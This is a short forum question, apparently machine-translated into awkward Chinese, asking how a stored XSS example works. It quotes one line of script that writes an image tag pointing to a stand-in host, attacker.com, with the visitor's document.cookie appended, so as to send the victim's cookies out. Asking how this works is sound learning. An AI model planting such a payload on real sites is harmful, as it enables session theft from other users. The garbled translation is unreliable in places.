如同這裏許多可能知道,目前的XSS攻擊通常有兩種形式: 1 - 攻擊者上傳標籤公共bulliten板,博客,或其他網站 有XSS漏洞,並有很多其他用戶將訪問。攻擊者通常 收成後用戶模仿網站的Cookie,但表單提交和其他攻擊 有時利用。這就是我所說的許多人認爲XSS是。 下面是一個例子:
有人將張貼在evilblog.com以下,其他用戶將處理
<script>document.write("<img src=http://attacker.com/」 + document.cookie + 「>」)</script>
這將盡量拉的圖像攻擊者的服務器與用戶的evilblog cookies在URL 。
我的問題:
我不明白上面被寫圖像URL路徑的目的/結果。任何人都可以詳細說明這一點嗎?
PS:這是什麼意思爲「這會盡量拉的圖像攻擊者的服務器的URL用戶的evilblog曲奇」
關於使用圖像的透徹解釋。謝謝。 – Ricky 2010-04-12 11:17:48